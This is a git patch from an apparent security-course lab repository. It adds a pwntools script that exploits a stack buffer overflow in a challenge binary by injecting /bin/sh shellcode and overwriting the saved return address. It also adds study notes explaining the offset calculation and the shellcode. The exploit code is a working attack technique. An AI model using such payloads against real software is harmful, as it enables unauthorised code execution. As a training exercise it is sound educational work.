From 88157a623e82d0a8448888d73a43881279e546e5 Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Wed, 16 Oct 2024 20:21:55 -0700 Subject: [PATCH] lab 4b - shellcode injection --- 4b/lab4b_1.py | 78 +++++++++++++++++++++++++++++++++++++++++++++++++++ Dojo Notes.md | 34 ++++++++++++++++++++-- 2 files changed, 110 insertions(+), 2 deletions(-) create mode 100644 4b/lab4b_1.py diff --git a/4b/lab4b_1.py b/4b/lab4b_1.py new file mode 100644 index 0000000..5cf5138 --- /dev/null +++ b/4b/lab4b_1.py @@ -0,0 +1,78 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# This exploit template was generated via: +# $ pwn template /challenge/run +from pwn import * + +# Set up pwntools for the correct architecture +context.update(arch='amd64', os='linux') +exe = context.binary = ELF(args.EXE or '/challenge/run') + +# Many built-in settings can be controlled on the command-line and show up +# in "args". For example, to dump all data sent/received, and disable ASLR +# for all created processes... +# ./exploit.py DEBUG NOASLR + + + +def start(argv=[], *a, **kw): + '''Start the exploit against the target.''' + if args.GDB: + return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) + else: + return process([exe.path] + argv, *a, **kw) + +# Specify your GDB script here for debugging +# GDB will be launched if the exploit is run via e.g. +# ./exploit.py GDB +gdbscript = ''' +break interact +'''.format(**locals()) + +#=========================================================== +# EXPLOIT GOES HERE +#=========================================================== +# Arch: amd64-64-little +# RELRO: No RELRO +# Stack: No canary found +# NX: NX unknown - GNU_STACK missing +# PIE: No PIE (0x400000) +# Stack: Executable +# RWX: Has RWX segments + +io = start() + +# discard debug output, something about gdb connecting +if args.GDB: + io.recv() +# first line - welcome msg, asks for confirmation +print("[<<<] Received:-\t\t" + io.recv().decode(), end='') + +payload_1 = b'Y\n' +print("[>>>>] Sending:-\t\t" + payload_1.decode(), end='') +io.send(payload_1) + +# gives rsp address and takes input +rsp_line = io.recv().decode() +print("[<<<] Received:-\t\t" + rsp_line, end='') +rsp_str = rsp_line.split()[-1].replace("\n", "") +print("[O] The rsp is:-\t\t" + rsp_str) +rsp_val = int(rsp_str, base=16) + +unbound_buffer = 0x7ffe33763820 +saved_rip = 0x7ffe337638c8 +offset = saved_rip-unbound_buffer + +payload_2_shellcode = asm(shellcraft.sh()) # from pwn +payload_2_padding = b'F' * (offset - len(payload_2_shellcode)) # pad gap between end of shellcode up until saved_rip +payload_2_rip = p64(rsp_val) # in this challenge, the vuln variable is last in stack, so rsp points to the variable's location + +payload_2 = payload_2_shellcode + payload_2_padding + payload_2_rip + b'\n' + +io.send(payload_2) +print("[>>>>] Sending final payload...") + +# root shell gained +io.send(b"cat /flag \n") + +io.interactive() diff --git a/Dojo Notes.md b/Dojo Notes.md index 18cf7f7..65c0de4 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -57,9 +57,9 @@ - 'mangling' is just subtracting 3 from the char's ascii value. so just add 3 to the key -### .03 - xor plus +### .03 - XOR plus -- mangling is adding 3 then xor with 2. so just xor with 2, then subtract 3 +- mangling is adding 3 then XOR with 2. so just XOR with 2, then subtract 3 ### lab 2a.02 @@ -374,3 +374,33 @@ done - calculate offset from vulnerable variable location to saved RIP(return instruction pointer) location - get address of target function to execute - craft payload accordingly + +### lab 4b.1 - overflow + shellcoding 1 + +- buffer overflow vuln +- have to write and inject shellcode +- checksec says protections are disabled +- pwntools generated shellcode for `/bin/sh`: + - push `/bin/sh` to stack, set `ebx` to this address + - setting argv - push `sh` null-terminated (hv to use XOR trick to null-terminate, which isn't necessary for memcpy tho), set `ecx` to this address + - setting env - XOR out `edx` + - executing execve - syscall `execve` +- so + - get shellcode on the stack + - calc offset from rsp to start of shellcode + - rsp is obtained at runtime, program outputs it + - if we put shellcode in the vulnerable variable, we can use its location to store shellcode since its not being modified + - and in this case, rsp=variable location cuz last variable on stack + - add offset to rsp to get shellcode location + - put that as target rip + - padding in between + - boom + +### lab 4b.2 - overflow + shellcoding 2 + +- ummm +- apparently the difference was replacing memcpy with strcpy +- memcpy doesn't care about null bytes, strcpy does +- but since i used robust shellcode from pwntools ahaha.... +- it already took care of that +- so 4b.1 solution applied here too